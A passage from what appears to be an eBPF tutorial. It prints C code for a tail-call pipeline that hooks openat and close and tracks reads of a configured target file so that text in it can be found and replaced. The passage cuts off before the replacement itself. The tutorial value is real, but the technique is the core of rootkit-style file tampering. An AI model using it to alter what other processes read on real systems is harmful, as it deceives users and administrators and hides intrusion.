&lt;p&gt;This pipeline handles the verifier's complexity limits by splitting the work across multiple programs, each staying under the instruction count threshold. Tail calls provide the glue, allowing one program to pass control to the next with the same context.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation Details
&lt;/h2&gt;

&lt;p&gt;Let's examine the complete eBPF code that implements this three-stage pipeline:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: BSD-3-Clause&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"vmlinux.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_tracing.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_core_read.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"replace.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"Dual BSD/GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// Ringbuffer Map to pass messages from kernel to user&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_RINGBUF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;256&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;rb&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Map to hold the File Descriptors from 'openat' calls&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;8192&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;map_fds&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Map to hold the buffer addresses from 'read' calls&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;8192&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;map_buff_addrs&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Maps to hold candidate and confirmed match addresses in the read buffer&lt;/span&gt;
&lt;span class="c1"&gt;// NOTE: This should probably be a map-of-maps, with the top-level&lt;/span&gt;
&lt;span class="c1"&gt;// key being pid_tgid, so we know we're looking at the right program&lt;/span&gt;
&lt;span class="cp"&gt;#define MAX_POSSIBLE_ADDRS 500
&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_POSSIBLE_ADDRS&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;map_name_addrs&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_POSSIBLE_ADDRS&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;map_to_replace_addrs&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Map holding the programs for tail calls&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_PROG_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;map_prog_array&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Optional Target Parent PID&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;target_ppid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// These store the name of the file to replace text in&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;filename_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

&lt;span class="c1"&gt;// These store the text to find and replace in the file&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt;  &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;text_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;text_find&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;FILENAME_LEN_MAX&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;text_replace&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;FILENAME_LEN_MAX&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_exit_close"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_close_exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_exit&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check if we're a process thread of interest&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;check&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;check&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Closing file, delete fd from all maps to clean up&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_delete_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_delete_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_buff_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_enter_openat"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_openat_enter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_enter&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="c1"&gt;// Check if we're a process thread of interest&lt;/span&gt;
    &lt;span class="c1"&gt;// if target_ppid is 0 then we target all pids&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;target_ppid&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_get_current_task&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ppid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;real_parent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ppid&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;target_ppid&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Get filename from arguments&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;check_filename&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;FILENAME_LEN_MAX&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="n"&gt;bpf_probe_read_user&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;check_filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;

    &lt;span class="c1"&gt;// Check filename is our target&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;filename_len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;check_filename&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Add pid_tgid to map for our sys_exit call&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;zero&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;zero&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d Filename %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_exit_openat"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_openat_exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_exit&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check this open call is opening our target file&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;check&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;check&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

